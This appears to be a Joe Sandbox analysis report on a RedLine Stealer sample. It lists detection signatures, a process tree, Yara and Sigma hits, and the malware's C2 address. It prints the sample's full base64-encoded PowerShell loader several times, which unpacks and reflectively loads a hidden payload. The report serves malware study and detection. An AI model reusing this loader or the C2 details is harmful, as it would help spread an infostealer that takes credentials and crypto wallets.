Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
f6FauZ2CEz.exe

Overview

General Information

Sample name:f6FauZ2CEz.exe
renamed because original name is a hash value
Original sample name:1544dbca0efc2c0105dd7d52a21a8891.exe
Analysis ID:1431938
MD5:1544dbca0efc2c0105dd7d52a21a8891
SHA1:7fbacdb27457829215cd182eab0a4e4bb4379648
SHA256:d5038b0adfdfc36c23dbaafd982bb50bb0e9fc10838e731e10d182d91b28d970
Tags:exeRedLineStealer
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Powershell decode and execute
Yara detected RedLine Stealer
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs new ROOT certificates
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops certificate files (DER)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • f6FauZ2CEz.exe (PID: 6696 cmdline: "C:\Users\user\Desktop\f6FauZ2CEz.exe" MD5: 1544DBCA0EFC2C0105DD7D52A21A8891)
    • wscript.exe (PID: 4928 cmdline: "wscript.exe" "C:\Users\user\start.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 5728 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1188 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KIyAiVGhlIHN1cmVzdCB3YXkgdG8gY29ycnVwdCBhIHlvdXRoIGlzIHRvIGluc3RydWN0IGhpbSB0byBob2xkIGluIGhpZ2hlciBlc3RlZW0gdGhvc2Ugd2hvIHRoaW5rIGFsaWtlIHRoYW4gdGhvc2Ugd2hvIHRoaW5rIGRpZmZlcmVudGx5LiINCiMgIkluIGhlYXZlbiwgYWxsIHRoZSBpbnRlcmVzdGluZyBwZW9wbGUgYXJlIG1pc3NpbmcuIg0KIyAiSGUgd2hvIGhhcyBhIHdoeSB0byBsaXZlIGNhbiBiZWFyIGFsbW9zdCBhbnkgaG93LiINCiMgIlRvIGxpdmUgaXMgdG8gc3VmZmVyLCB0byBzdXJ2aXZlIGlzIHRvIGZpbmQgc29tZSBtZWFuaW5nIGluIHRoZSBzdWZmZXJpbmcuIg0KIyAiV2l0aG91dCBtdXNpYywgbGlmZSB3b3VsZCBiZSBhIG1pc3Rha2UuIg0KDQoNCmZ1bmN0aW9uIFJldmVyc2VTdHJpbmcoJGlucHV0U3RyaW5nKSB7DQogICAgJGNoYXJBcnJheSA9ICRpbnB1dFN0cmluZy5Ub0NoYXJBcnJheSgpDQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0NCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheQ0KICAgIHJldHVybiAkcmV2ZXJzZWRTdHJpbmcNCn0NCiMgIlRoZXJlIGlzIGFsd2F5cyBzb21lIG1hZG5lc3MgaW4gbG92ZS4gQnV0IHRoZXJlIGlzIGFsc28gYWx3YXlzIHNvbWUgcmVhc29uIGluIG1hZG5lc3MuIg0KIyAiVGhhdCB3aGljaCBkb2VzIG5vdCBraWxsIHVzIG1ha2VzIHVzIHN0cm9uZ2VyLiINCg0KZnVuY3Rpb24gQ2xvc2UtUHJvY2VzcyB7DQogICAgcGFyYW0oDQogICAgICAgIFtzdHJpbmddJFByb2Nlc3NOYW1lDQogICAgKQ0KDQogICAgJHByb2Nlc3MgPSBHZXQtUHJvY2VzcyAtTmFtZSAkUHJvY2Vzc05hbWUgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUNCg0KICAgIGlmICgkcHJvY2VzcyAtbmUgJG51bGwpIHsNCiAgICAgICAgU3RvcC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRm9yY2UNCgl9DQp9DQojICJJbiBpbmRpdmlkdWFscywgaW5zYW5pdHkgaXMgcmFyZTsgYnV0IGluIGdyb3VwcywgcGFydGllcywgbmF0aW9ucywgYW5kIGVwb2NocywgaXQgaXMgdGhlIHJ1bGUuIg0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KZnVuY3Rpb24gQ05WKCRhcnIpeyANCiAgICAkbz0xMjM7IA0KICAgICRkPSRudWxsOyANCiAgICBmb3JlYWNoKCRpIGluICRhcnIpeyANCiAgICAgICAgaWYgKCRpIC1ndCAxMjcpIHsgDQogICAgICAgICAgICAkZCs9IFtjaGFyXSgkaS0kbykgDQogICAgICAgIH0gZWxzZSB7IA0KICAgICAgICAgICAgJGQrPSBbY2hhcl0oJGkrJG8pIA0KICAgICAgICB9IA0KICAgIH0gDQogICAgcmV0dXJuICRkIA0KfQ0KDQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENOViAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgIlFKSEphcC5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\user\QJHJap.ps1' -Encoding UTF8" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 7184 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\QJHJap.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • RegAsm.exe (PID: 7276 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": "5.42.92.179:18418", "Authorization Header": "bd91fb2c760240811ff8b4d73e01e2d2"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\QJHJap.ps1JoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000006.00000002.1857321756.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000005.00000002.1719342950.0000000006DDA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                00000005.00000002.1719342950.000000000650F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  Click to see the 6 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  5.2.powershell.exe.7190980.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    6.2.RegAsm.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      5.2.powershell.exe.7190980.1.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security

                        Other

                        SourceRuleDescriptionAuthorStrings
                        amsi32_7184.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Base64 Encoded PowerShell Command Detected
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KIyAiVGhlIHN1cmVzdCB3YXkgdG8gY29ycnVwdCBhIHlvdXRoIGlzIHRvIGluc3RydWN0IGhpbSB0byBob2xkIGluIGhpZ2hlciBlc3RlZW0gdGhvc2Ugd2hvIHRoaW5rIGFsaWtlIHRoYW4gdGhvc2Ugd2hvIHRoaW5rIGRpZmZlcmVudGx5LiINCiMgIkluIGhlYXZlbiwgYWxsIHRoZSBpbnRlcmVzdGluZyBwZW9wbGUgYXJlIG1pc3NpbmcuIg0KIyAiSGUgd2hvIGhhcyBhIHdoeSB0byBsaXZlIGNhbiBiZWFyIGFsbW9zdCBhbnkgaG93LiINCiMgIlRvIGxpdmUgaXMgdG8gc3VmZmVyLCB0byBzdXJ2aXZlIGlzIHRvIGZpbmQgc29tZSBtZWFuaW5nIGluIHRoZSBzdWZmZXJpbmcuIg0KIyAiV2l0aG91dCBtdXNpYywgbGlmZSB3b3VsZCBiZSBhIG1pc3Rha2UuIg0KDQoNCmZ1bmN0aW9uIFJldmVyc2VTdHJpbmcoJGlucHV0U3RyaW5nKSB7DQogICAgJGNoYXJBcnJheSA9ICRpbnB1dFN0cmluZy5Ub0NoYXJBcnJheSgpDQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0NCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheQ0KICAgIHJldHVybiAkcmV2ZXJzZWRTdHJpbmcNCn0NCiMgIlRoZXJlIGlzIGFsd2F5cyBzb21lIG1hZG5lc3MgaW4gbG92ZS4gQnV0IHRoZXJlIGlzIGFsc28gYWx3YXlzIHNvbWUgcmVhc29uIGluIG1hZG5lc3MuIg0KIyAiVGhhdCB3aGljaCBkb2VzIG5vdCBraWxsIHVzIG1ha2VzIHVzIHN0cm9uZ2VyLiINCg0KZnVuY3Rpb24gQ2xvc2UtUHJvY2VzcyB7DQogICAgcGFyYW0oDQogICAgICAgIFtzdHJpbmddJFByb2Nlc3NOYW1lDQogICAgKQ0KDQogICAgJHByb2Nlc3MgPSBHZXQtUHJvY2VzcyAtTmFtZSAkUHJvY2Vzc05hbWUgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUNCg0KICAgIGlmICgkcHJvY2VzcyAtbmUgJG51bGwpIHsNCiAgICAgICAgU3RvcC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRm9yY2UNCgl9DQp9DQojICJJbiBpbmRpdmlkdWFscywgaW5zYW5pdHkgaXMgcmFyZTsgYnV0IGluIGdyb3VwcywgcGFydGllcywgbmF0aW9ucywgYW5kIGVwb2NocywgaXQgaXMgdGhlIHJ1bGUuIg0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KZnVuY3Rpb24gQ05WKCRhcnIpeyANCiAgICAkbz0xMjM7IA0KICAgICRkPSRudWxsOyANCiAgICBmb3JlYWNoKCRpIGluICRhcnIpeyANCiAgICAgICAgaWYgKCRpIC1ndCAxMjcpIHsgDQogICAgICAgICAgICAkZCs9IFtjaGFyXSgkaS0kbykgDQogICAgICAgIH0gZWxzZSB7IA0KICAgICAgICAgICAgJGQrPSBbY2hhcl0oJGkrJG8pIA0KICAgICAgICB9IA0KICAgIH0gDQogICAgcmV0dXJuICRkIA0KfQ0KDQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIs
                          Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KIyAiVGhlIHN1cmVzdCB3YXkgdG8gY29ycnVwdCBhIHlvdXRoIGlzIHRvIGluc3RydWN0IGhpbSB0byBob2xkIGluIGhpZ2hlciBlc3RlZW0gdGhvc2Ugd2hvIHRoaW5rIGFsaWtlIHRoYW4gdGhvc2Ugd2hvIHRoaW5rIGRpZmZlcmVudGx5LiINCiMgIkluIGhlYXZlbiwgYWxsIHRoZSBpbnRlcmVzdGluZyBwZW9wbGUgYXJlIG1pc3NpbmcuIg0KIyAiSGUgd2hvIGhhcyBhIHdoeSB0byBsaXZlIGNhbiBiZWFyIGFsbW9zdCBhbnkgaG93LiINCiMgIlRvIGxpdmUgaXMgdG8gc3VmZmVyLCB0byBzdXJ2aXZlIGlzIHRvIGZpbmQgc29tZSBtZWFuaW5nIGluIHRoZSBzdWZmZXJpbmcuIg0KIyAiV2l0aG91dCBtdXNpYywgbGlmZSB3b3VsZCBiZSBhIG1pc3Rha2UuIg0KDQoNCmZ1bmN0aW9uIFJldmVyc2VTdHJpbmcoJGlucHV0U3RyaW5nKSB7DQogICAgJGNoYXJBcnJheSA9ICRpbnB1dFN0cmluZy5Ub0NoYXJBcnJheSgpDQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0NCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheQ0KICAgIHJldHVybiAkcmV2ZXJzZWRTdHJpbmcNCn0NCiMgIlRoZXJlIGlzIGFsd2F5cyBzb21lIG1hZG5lc3MgaW4gbG92ZS4gQnV0IHRoZXJlIGlzIGFsc28gYWx3YXlzIHNvbWUgcmVhc29uIGluIG1hZG5lc3MuIg0KIyAiVGhhdCB3aGljaCBkb2VzIG5vdCBraWxsIHVzIG1ha2VzIHVzIHN0cm9uZ2VyLiINCg0KZnVuY3Rpb24gQ2xvc2UtUHJvY2VzcyB7DQogICAgcGFyYW0oDQogICAgICAgIFtzdHJpbmddJFByb2Nlc3NOYW1lDQogICAgKQ0KDQogICAgJHByb2Nlc3MgPSBHZXQtUHJvY2VzcyAtTmFtZSAkUHJvY2Vzc05hbWUgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUNCg0KICAgIGlmICgkcHJvY2VzcyAtbmUgJG51bGwpIHsNCiAgICAgICAgU3RvcC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRm9yY2UNCgl9DQp9DQojICJJbiBpbmRpdmlkdWFscywgaW5zYW5pdHkgaXMgcmFyZTsgYnV0IGluIGdyb3VwcywgcGFydGllcywgbmF0aW9ucywgYW5kIGVwb2NocywgaXQgaXMgdGhlIHJ1bGUuIg0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KZnVuY3Rpb24gQ05WKCRhcnIpeyANCiAgICAkbz0xMjM7IA0KICAgICRkPSRudWxsOyANCiAgICBmb3JlYWNoKCRpIGluICRhcnIpeyANCiAgICAgICAgaWYgKCRpIC1ndCAxMjcpIHsgDQogICAgICAgICAgICAkZCs9IFtjaGFyXSgkaS0kbykgDQogICAgICAgIH0gZWxzZSB7IA0KICAgICAgICAgICAgJGQrPSBbY2hhcl0oJGkrJG8pIA0KICAgICAgICB9IA0KICAgIH0gDQogICAgcmV0dXJuICRkIA0KfQ0KDQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIs
                          Sigma detected: PowerShell Base64 Encoded Invoke Keyword
                          Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KIyAiVGhlIHN1cmVzdCB3YXkgdG8gY29ycnVwdCBhIHlvdXRoIGlzIHRvIGluc3RydWN0IGhpbSB0byBob2xkIGluIGhpZ2hlciBlc3RlZW0gdGhvc2Ugd2hvIHRoaW5rIGFsaWtlIHRoYW4gdGhvc2Ugd2hvIHRoaW5rIGRpZmZlcmVudGx5LiINCiMgIkluIGhlYXZlbiwgYWxsIHRoZSBpbnRlcmVzdGluZyBwZW9wbGUgYXJlIG1pc3NpbmcuIg0KIyAiSGUgd2hvIGhhcyBhIHdoeSB0byBsaXZlIGNhbiBiZWFyIGFsbW9zdCBhbnkgaG93LiINCiMgIlRvIGxpdmUgaXMgdG8gc3VmZmVyLCB0byBzdXJ2aXZlIGlzIHRvIGZpbmQgc29tZSBtZWFuaW5nIGluIHRoZSBzdWZmZXJpbmcuIg0KIyAiV2l0aG91dCBtdXNpYywgbGlmZSB3b3VsZCBiZSBhIG1pc3Rha2UuIg0KDQoNCmZ1bmN0aW9uIFJldmVyc2VTdHJpbmcoJGlucHV0U3RyaW5nKSB7DQogICAgJGNoYXJBcnJheSA9ICRpbnB1dFN0cmluZy5Ub0NoYXJBcnJheSgpDQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0NCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheQ0KICAgIHJldHVybiAkcmV2ZXJzZWRTdHJpbmcNCn0NCiMgIlRoZXJlIGlzIGFsd2F5cyBzb21lIG1hZG5lc3MgaW4gbG92ZS4gQnV0IHRoZXJlIGlzIGFsc28gYWx3YXlzIHNvbWUgcmVhc29uIGluIG1hZG5lc3MuIg0KIyAiVGhhdCB3aGljaCBkb2VzIG5vdCBraWxsIHVzIG1ha2VzIHVzIHN0cm9uZ2VyLiINCg0KZnVuY3Rpb24gQ2xvc2UtUHJvY2VzcyB7DQogICAgcGFyYW0oDQogICAgICAgIFtzdHJpbmddJFByb2Nlc3NOYW1lDQogICAgKQ0KDQogICAgJHByb2Nlc3MgPSBHZXQtUHJvY2VzcyAtTmFtZSAkUHJvY2Vzc05hbWUgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUNCg0KICAgIGlmICgkcHJvY2VzcyAtbmUgJG51bGwpIHsNCiAgICAgICAgU3RvcC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRm9yY2UNCgl9DQp9DQojICJJbiBpbmRpdmlkdWFscywgaW5zYW5pdHkgaXMgcmFyZTsgYnV0IGluIGdyb3VwcywgcGFydGllcywgbmF0aW9ucywgYW5kIGVwb2NocywgaXQgaXMgdGhlIHJ1bGUuIg0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMg